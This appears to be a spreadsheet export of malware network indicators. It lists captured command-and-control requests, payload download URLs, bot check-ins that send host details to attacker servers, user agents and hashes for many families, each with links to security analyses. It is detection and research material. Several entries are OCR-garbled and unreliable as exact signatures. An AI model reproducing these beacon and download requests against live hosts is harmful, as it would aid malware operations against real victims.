<yahoo sb=""CcNQ03px5eovHIwYjIdfgRzFURpvH8fqL8mv0JTF5EOoUJx8t62VCX@@(25043)""></yahoo>" IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116) b21ba443726385c11802a8ad731771c0 http://intelreport.mandiant.com/
Tapaoux GET /ol/yahoo/banner4.php?jpg=../yahoo /banner4.php?jpg=../yahoo "/ol/yahoo/banner4.php?jpg=../yahoo
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
Host: re.policy-forums.org" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) 60AF79FB0BD2C9F33375035609C931CB
Horst Proxy GET /socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0 /proxy.php?ip= "/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0
User-Agent: Mozilla/5.0
Host: ldark.com

HTTP/1.1 302 Found
Date: Tue, 14 May 2013 02:49:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze15
Location: http://ww41.ldark.com/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8" Mozilla/5.0 EFE5529D697174914938F4ABF115F762
PassAlert GET /loader/bin/file1.exe /bin/file1.exe "/loader/bin/file1.exe
User-Agent: Mozilla/5.0
Host: porno-video-free.com" Mozilla/5.0 B4A1368515C6C39ACEF63A4BC368EDB2
Bitcoinminer POST / "/
Authorization: Basic cXdlcnR5MTIzLjE6eA==
Host: www2.x3x4.su:666
Accept-Encoding: deflate, gzip
Content-Type: application/json
Content-Length: 45
User-Agent: cpuminer 2.2.3
X-Mining-Extensions: midstate

{""method"": ""getwork"", ""params"": [], ""id"":0}
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 12 May 2013 22:56:11 GMT
Content-Type: application/json
Content-Length: 635
Connection: keep-alive

{""result"": {""data"": ""000000017343cad1ae316260d1f2c262cc391443453a09fd8c8630e3bce86c47b3e476b73eaf9a0cf5eb36e74577ff3cb29f9267f5f300f252235ba77f47a9ea7aba6dba51901e351b6dcb6a00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000"", ""hash1"": ""00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000"", ""midstate"": ""b1313289534677d23f93a6447a02047a09c369962cd1029393f5a2063368dcf2"", ""algorithm"": ""scrypt:1024,1,1"", ""target"": ""ffffffffffffffffffffffffffffffffffffffffffffffffffffffff07000000""}, ""id"": 0, ""error"": null}" User-Agent: cpuminer 2.2.3 666 12E717293715939C5196E604591A97DF
Karagany Loader GET /user/go.php?html=do /go.php?html=do "User-Agent: User-Agent: Opera/10.60 Presto/2.2.30
Host: mildpass.co.cc" User-Agent: Opera/10.60 Presto/2.2.30 E6CBCEDD4D7150357312323B6F8EFA3F http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKaragany.I#techdetails_link
Gh0st Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 Gh0st Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 122B34A05530316E919604EF52EB9F1A http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html
IXESHE GET "/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA" /AWS96.jsp? "/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9jOKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: freedream.strangled.net:443
Connection: Keep-Alive" User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 443 0F88D9B0D237B5FCDC0F985A548254F2
KoreanBanker DL GET /web/down/kbs.exe /down/kbs.exe "Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.colorephone.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) "E50A715D3A16CBD57339DD4C8D4605C8
8C1B83D95394BB52921DF6A218ECCA61" "http://labs.alienvault.com/labs/index.php/2013/a-theory-on-the-south-korean-attacks/
http://www.theregister.co.uk/2013/03/20/south_korea_cyberattack/"
Plugx SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO46Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png 443 "RTF 42fba80f105aa53dfbf50aeba2d73cae >>
BIN 3C74A85C2CF883BD9D4B9F8B9746030F" "http://www.circl.lu/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/ 
http://espionageware.blogspot.com/2013/05/tracing-apt163qq.html
http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/"
PowerLoader POST /postnuke/blog.php /blog.php "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: real-newslife.com
Content-Length: 84
Cache-Control: no-cache

.............y..W..
,.1xV.....>.V>59..5K.xdH.h@<............./..._.4W.%.i.Oh.M....4." Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) "PowerLoaderv1 CE8B6E20E0EE177174FCA864C7451731
PowerLoaderv1 D4D96F60F6723B8EC5F1677D4657BE83
PowerLoaderv2 7DE3350CAFBE8FE843AEA9E8564E6AF5
4497A231DA9BD0EEA327DDEC4B31DA12 - May 2013" http://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
RssFeeder (moved from TBD tab, common name still unknown) 2nd stage POST /orange/news.php /news.php "Accept: /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: killme.98.shoptupian.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache

cstype=server&authname=servername&authpass=serverpass&hostname=DELLXT&ostype=Microsoft Windows XP Professional3&macaddr=00:0C:29:71:24:89&owner=two13&version=1.2.0&t=4841HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jan 2013 05:47:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/css
<div id=""0a552b5a4352"">{'command':[]}</div>" 68EE5FDA371E4AC48DAD7FCB2C94BAC7
RssFeeder (moved from TBD tab, common name still unknown) initialGET POST /data/rss /rss "/data/rss
Accept: /
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept-Encoding: gzip, deflate
Host: huming386.livejournal.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:49:06 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Content-Length: 592
Accept-Ranges: bytes
X-Varnish: 1502242906 1495326149
Age: 33018
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish" 68EE5FDA371E4AC48DAD7FCB2C94BAC7
Swami GET /im/linux.php /linux.php "Host: www.maintechy.com
Content-Length: 2281
Cache-Control: no-cache" 972c692625bd57f0c7264c9e048752f6 33A5B48073AE9A11EC2F26318D0C4721 http://byt0r.blogspot.com/2012/06/quick-notes-wpct-action-plan-from.html
GameThief GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 /get.asp?mac= "User-Agent: Google page
Host: 198.105.210.180
Cache-Control: no-cache" Google page "ECBA0FEB36F9EF975EE96D1694C8164C
4e4ea8acc683bdd054e032f8a2895c74" http://www.threatexpert.com/report.aspx?md5=ecba0feb36f9ef975ee96d1694c8164c
Beebone downloader GET "<p>/0/?f|-1813912965Admin
<p>/a/76876332/1" "{random}.{domain}:{port}/{number}/{affiliate_id}|{hdserial}{username}
/0/?f|-1813912965Admin
/1/?b|-2020396961winxp
/2/?f|-1396129654Guest
/9/?a|-1312965453MyPC
/0/?f|-2713912961Developer
/0/?b|-5711296542Windows7
/1/?a|-1296545361Administrator
/0/?f|-1813912965Admin
a/76876332/1
/a/76876332/bb1" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) "Random
41001
30980
8080
443" http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fBeebone#techdetails_link
Neutrino EK var POST /cxiqocvbqd "x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://thejegos. info/lkijppm?fqogndmmqm=7737359
Accept: /
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; windows NT 6.1; Trident/4.0; SLCC2; .NET CLR ‘2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0. 30729)
Host: thejegos. info
Content-Length: 769
Connection: Keep-Al ive
Cache-Control: no-cache 

pcnfjrcxxpu=gbdl nep&ivexxbpclutvfxs=%251C%2540%250C%2505%2SOAGJEwU%2558XR1%2502%2500%2505%250E%250Fw
%2513%2504Z%255D%255D%250AU%2540%255E%2506%2501%2509L1R%2517%250E%2511%250B%2507%250B%2503EX%2S1FN%
250F%2501%251F%2505%2507%2538%251E%250B%2504%2514%2502%251OFVLT%2S4OKRH%2SSCBURK%2540%250E%250D%
2518%2504R%255D%250C%2511%2500%25021R%2501%250E%2505%251F%2506GJ%2509%2517%2508%2SOOBG%2501%2512%
2508%2507%25071%2511%2519%250A%2507FV%2500%2510%251C%2SOBNF%251E%2508%2504%251C8%2512%2508%250D%
2508%2SOEHN%251D%250C%251C%2511%2507%25163%2502%250C%2517%250F%2516FV%2500%2510%251C%2SOBNF%251A%
2502%2506R%255D%250C%2511%2500%25021R%2510%250F%2514NT%250B%2505%250B%250E%2519%2S11" Mozilla/4.0 (compatible; MSIE 8.0; windows NT 6.1; Trident/4.0; SLCC2; .NET CLR ‘2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0. 30729) http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html
Comfoo / Vinself / Mspub POST /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/ "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, /
Accept-Language: en-en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)
Host: mail.lthreebox.com
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1) 69bb7612b2e6a0f647b3e9c93b0bf572 DA52D94C1F5D46F5C1F73D60DA04C53C http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf
Destory Rat / Sogu / Thoper POST /update?id=000f72b8 /update?id= "Accept: /
X-Session: 0..X- Status: 0
X-Siz e: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 ; Windows NT 5.1 ; .NET CLR 2.0.5 0727; SV1)
Host : localhost 
Content-Length: 0
Connection: Keep -Alive
Cache-Control: no-cache." Mozilla/4.0 (compatible; MSIE 6.0 ; Windows NT 5.1 ; .NET CLR 2.0.5 0727; SV1) 2385B332637DD37E4E5C79A1FED46171 http://www.threatexpert.com/report.aspx?md5=2385b332637dd37e4e5c79a1fed46171
Disttrack / Shamoon GET /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203 /data.asp?mydata= "/ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0
User-Agent: you" you "D214C717A357FE3A455610B197C390AA
B14299FD4D1CBFB4CC7486D978398214" http://vrt-blog.snort.org/2012/08/new-threat-disttrack.html
Avatar Rootkit GET /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance &sort=relevance "/search?query=EZTFDHWP&sort=relevance
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0)
Host: groups . yahoo. corn
" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0) "Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57
Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde" http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/
9002 POST 9002..................wx....9002..................wx....9002....................... 9002 9002..................wx....9002..................wx....9002........................9002........!............. .....9002..... .............p.....MZ..................@..:...X..'........!..L.!This program cannot be run in DOS mode. "D4ED654BCDA42576FDDFE03361608CAA
3de314089db35af9baaeefc598f09b23(doc dropper)
2568615875525003688839cb8950aeae (doc dropper)" http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
MSWab /Yayih POST /bbs/info.asp /info.asp "/bbs/info.asp
Host: 199.192.156.134:443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache

3D333531501A7770a...H...H...XPSP3-OFC2007-R|us0302|10.0.2.15|WinNT v5.1 build 2600 - Service Pack 3|HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: ......, 04 .... 12 15:09:11 GMT
Content-Length: 12
Cache-Control: no-cache" FD1BE09E499E8E380424B3835FC973A8 "http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fYayih.A#techdetails_link
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html#more
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fYayih.A#techdetails_link"
ZeroAccess / Sirefef GET "/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25
/count.php?page=952000&style=LED_g&nbdigits=9" /stat2.php?w= "HOST: iivxhdcd.cn
User-Agent: Opera/6 (Windows NT 5.1; U; LangID=409; x86)
Connection: close ""
----------------------------------------------
2013-05
ip check
/app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
followed by counter checkin-----------
/count.php?page=952000&style=LED_g&nbdigits=9
Host: www.e-zeeinternet.com
User-Agent: Opera/10 (Windows NT 5.1; US; x86)
Connection: close


HTTP/1.1 200 OK
Date: Tue, 07 May 2013 11:02:01 GMT
Server: Apache/2.2.24
Set-Cookie: ez_counter_952000=1
Content-Length: 255
Connection: close
Content-Type: image/png

.PNG." "The user agent is either Opera 5, 6, or 7, and may include a “LangID” parameter as in:
Opera/6 (Windows NT %u.%u; U; LangID=%x; x86)" "http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/
http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf

"
ZeroAccess / Sirefef ppc fraud - redirect GET HTTP/1.1 302 Moved Temporarily "Server: nginx/0.9.3 
Date: Mon, 28 Nov 2011 02:00:11 GMT 
Connection: keep-alive 
Location: http://www4search.net/?keyword=akbar+jobs&p=0|
0|eaeab70d-72b8-4492-8666-27bbd7174489 Content-Length: 0" "http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/
http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf

"
9002 POST /2d /2d "HTTP 189/0 HTTP/1..1
HTTP 189/1
HTTP 189/2
HTTP 189/3
HTTP 189/4
HTTP 189/f
HTTP 190/10
HTTP 190/11

/2d HTTP/1. 1
Use-Agent: lynx
Host: ieee.boeing-job.com
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache
AA" lynx "
3de314089db35af9baaeefc598f09b23(doc dropper)
2568615875525003688839cb8950aeae (doc dropper)" http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
Asprox / Kuluoz gets list of C2s GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 "/4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
" Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) 8080 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Asprox / Kuluoz Checkin GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
" Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) 8080 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Asprox / Kuluoz GETs spam template GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82 "/78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82
Content-Type: application/x-www-form-urlencoded
Content-Transfer-Encoding: base64
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: 50.22.136.150:8080
Connection: Keep-Alive
" Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) 8080 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Carberb POST /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm "Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: caaarrp2.ru
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 60" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) http://blog.avast.com/2013/04/08/carberp_epitaph/
FakeAV var (via Kuluoz - Asprox botnet) GET /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F "/AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 208.88.5.229:808" Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) 8080 b64b5af4262cf23f3fbc54448c6311d8 http://www.nsai.it/2013/01/23/italian-dhl-spam/ https://www.virustotal.com/en/file/c49f7dbc036ad0a86df02cbbde00cb3b3fbd651d82f6c9c5a98170644374f64f/analysis/
Favorites GET /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE /download731106?h1= "/download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1)
Host: 140.112.19.195
Connection: Keep-Alive" Mozilla/5.0 (compatible; Windows NT 5.1) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites GET /search?qu= /search?qu= "User-Agent: Firefox/2.0.0.2
Host: www.google.com
Content-Length: 4
Connection: Keep-Alive" 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE /search59861?h1= "/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE
Accept: /
User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;)
Host: 140.112.19.195
Connection: Keep-Alive" Mozilla/5.0 (compatible;BKANAHEAFPEM;) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE /search613522?h1= "
/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
Accept: /
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2)
Host: 140.112.19.195
Connection: Keep-Alive" Mozilla/5.0 (compatible; Windows NT 5.2) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH /search25548?h1= "/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1)
Host: 140.112.19.195
Content-Length: 127
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/5.0 (compatible;Windows NT 5.1) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Favorites POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE /upload8806?h1= "/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE
Accept: /
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2)
Host: 140.112.19.195
Content-Length: 41
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/5.0 (compatible;Windows NT 5.2) 5e3eaca3806769836c3ad9d46a209644 http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/
Gh0st GET /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel] /cgi/online.asp?hostname= "/cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Win32) "04e237ad7f600bfc942f326f903dc9d8 
6a5dde931418e0549163fdb024e4f2ed 
265b38204738c9c0adc612142f861022" http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/
Gh0st var GET /h.gif?pid =113&v=130586214568 HTTP/ 1. 1 /h.gif?pid =113 "/h. gif ?pid =113&v=130586214568 HTTP/ 1. 1
Accept: /
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep- Alive

HTTP/1.0 200 0K
Content-type: text/html.
Content- l..ength:0
PCRatb . . . X. . . x . . . q. s. 2406. . . . S. . P. . c. 1. 4R. u. . .1—I . . . .1.1I
..al..bf.....ga..QUS.Z\..._\ s..PCRat x
" Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1) http://labs.alienvault.com/labs/index.php/2012/new-macontrol-variant-targeting-uyghur-users-the-windows-version-using-gh0st-rat/
Guntior - CN bootkit GET /yx/tongji.html /tongji.html "/yx/tongji.html
Accept: /..
Accept-Language: en-u
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: localhost:690
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; . NET CLR 2.0.50727) 15e692cf34a70fb364591622bff1e43a http://www.threatexpert.com/report.aspx?md5=15e692cf34a70fb364591622bff1e43a
Kuluoz.B downloader GET /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 /index.php?r=gate& <site>/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKuluoz.B&ThreatID=173812#techdetails_link
Ranbyus / Triton (Spy, Banking, smart cards) POST /releases/index.php /index.php "/releases/index.php
Content-Type: multipart/form-data, boundary=7DD02020A0D0000
User-Agent: gsa-crawler
Host: ___.__
Content-Length: 226
Connection: Keep-Alive
Cache-Control: no-cache

--7DD02020A0D0000
Content-Disposition: form-data; name=""q""
vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==
--7DD02020A0D0000" gsa-crawler F2744552D24F7EA31E64228EB3022830 "http://inresearching.blogspot.ru/2013/02/trojanwin32spyranbyus.html
http://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/
http://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/
http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2462"
Urausy (Ransomware) GET /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php _.php "/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Host: giwje.org
Cache-Control: no-cache" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 "99f31640347259d3d2b18105e493989e 
b5cdc60ec5dfee61a9567e69ea7b59df
2814562a614f6d3fe9b22d2329b016dc 06/09/12
58c5971869a315f12f319232d1f84f87 15/09/12
54a3874120c84aa0d1e9ddcd8e60052f 22/09/12
b98af65946f3025709e7283370c67d9d 31/01/13" https://www.botnets.fr/index.php/Urausy
Glasses GET /ewpindex.htm /ewpindex.htm "User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
Cache-Control: no-cache" https://citizenlab.org/2013/02/apt1s-glasses-watching-a-human-rights-organization/
IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT POST /index000000001.asp /index000000001.asp "Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
Host: update.microsoft.com
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 000041" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) d7c826ac94522416a0aecf5b7a5d2afe https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf
LURK GET "LURK0........x.kf.e.apgpbpa0c..#........
" "LURK0........x.kf.e.apgpbpa0c..#........
L.>...!`1..f.rF.......$..#....
...........fHe(b(c.dH.........l ..:..r..""...!..P
....v...V`z0d0`0.../.T.....g.)LURK0........x.c......" "https://citizenlab.org/wp-content/uploads/2012/07/10-2012-recentobservationsintibet.pdf
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html"
DNSWatch / Protux GET /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve /dnslookup?la= "2011-05
/dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
